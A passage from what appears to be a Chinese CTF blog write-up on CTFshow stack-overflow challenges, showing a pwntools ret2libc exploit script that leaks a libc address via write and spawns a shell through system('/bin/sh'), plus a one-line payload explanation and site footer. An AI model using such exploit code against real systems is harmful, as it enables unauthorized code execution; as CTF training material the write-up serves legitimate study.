<div class="highlight-wrap" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">context(log_level=<span class="string">&#x27;debug&#x27;</span>,arch=<span class="string">&#x27;x8&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line"><span class="comment">#p = remote(&quot;pwn.challenge.ctf.show&quot;, &quot;28221&quot;)</span></span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">offset = <span class="number">0x6B</span> + <span class="number">0x4</span></span><br><span class="line">main_addr = elf.symbols[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">payload = offset * <span class="string">b&#x27;a&#x27;</span> + p32(write_plt) + p32(main_addr) + p32(<span class="number">0</span>) + p32(write_got)+p32(<span class="number">4</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">write_addr = u32(p.recv(<span class="number">4</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(write_addr))</span><br><span class="line"></span><br><span class="line"><span class="comment">#write_addr = u32(p.recvuntil(&#x27;\xf7&#x27;)[-4:])</span></span><br><span class="line">libc = LibcSearcher(<span class="string">&quot;write&quot;</span>, write_addr)</span><br><span class="line">libc_base = write_addr - libc.dump(<span class="string">&quot;write&quot;</span>)</span><br><span class="line">system_addr = libc_base + libc.dump(<span class="string">&quot;system&quot;</span>)</span><br><span class="line">binsh_addr = libc_base + libc.dump(<span class="string">&quot;str_bin_sh&quot;</span>)</span><br><span class="line">payload = offset * <span class="string">b&#x27;a&#x27;</span> + p32(system_addr) + <span class="string">b&#x27;aaaa&#x27;</span> + p32(binsh_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<blockquote>
<p>write函数的地址 + 预留返回地址 + write函数的三个参数 （1 + write函数的真正地址（got表内的地址） + 打印的字节）</p>
</blockquote>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">首页</a></li>
        
          <li><a href="/search/">搜索</a></li>
        
          <li><a href="/links/">友链</a></li>
        
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn35"><span class="toc-number">1.</span> <span class="toc-text">pwn35</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn36"><span class="toc-number">2.</span> <span class="toc-text">pwn36</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn37"><span class="toc-number">3.</span> <span class="toc-text">pwn37</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn38"><span class="toc-number">4.</span> <span class="toc-text">pwn38</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn39"><span class="toc-number">5.</span> <span class="toc-text">pwn39</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn40"><span class="toc-number">6.</span> <span class="toc-text">pwn40</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn41"><span class="toc-number">7.</span> <span class="toc-text">pwn41</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn42"><span class="toc-number">8.</span> <span class="toc-text">pwn42</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn43"><span class="toc-number">9.</span> <span class="toc-text">pwn43</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn44"><span class="toc-number">10.</span> <span class="toc-text">pwn44</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#pwn45"><span class="toc-number">11.</span> <span class="toc-text">pwn45</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2024/01/22/pwn35-80/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2024/01/22/pwn35-80/&text=CTFshow 栈溢出"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2024/01/22/pwn35-80/&is_video=false&description=CTFshow 栈溢出"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=CTFshow 栈溢出&body=Check out this article: http://example.com/2024/01/22/pwn35-80/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2024/01/22/pwn35-80/&title=CTFshow 栈溢出"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2024/01/22/pwn35-80/&name=CTFshow 栈溢出&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2024/01/22/pwn35-80/&t=CTFshow 栈溢出"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2024
    d3f4u1t
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/search/">搜索</a></li><!--
     --><!--
       --><li><a href="/links/">友链</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
